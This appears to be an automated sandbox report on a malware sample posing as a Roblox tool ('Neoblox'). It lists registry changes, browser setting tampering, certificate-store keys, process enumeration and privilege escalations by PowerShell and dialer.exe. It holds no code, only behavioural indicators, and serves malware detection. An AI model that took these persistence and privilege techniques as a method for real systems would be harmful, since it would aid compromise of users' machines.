Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Neoblox.exe = "11001" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Neoblox\Neoblox.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718387624" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 5000310000000000cb5809ad10004c6f63616c003c0009000400efbecb582dabce58888e2e0000007057020000000100000000000000000000000000000022d73c004c006f00630061006c00000014000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c00434653461600310000000000cb582dab120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbecb582dabce58888e2e0000005c5702000000010000000000000000000000000000005162c0004100700070004400610074006100000042000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e00310000000000ce589b8e100054656d7000003a0009000400efbecb582dabce589b8e2e00000071570200000001000000000000000000000000000000a76bd000540065006d007000000014000000 C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-1276817940-128734381-631578427-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000c69856df45bcda01e92560424abcda0150d68cae83beda0114000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000ce589b8e10004e656f626c6f7800400009000400efbece589b8ece589b8e2e0000004daa0200000001000000000000000000000000000000ef57dc004e0065006f0062006c006f007800000016000000 C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\System32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dialer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
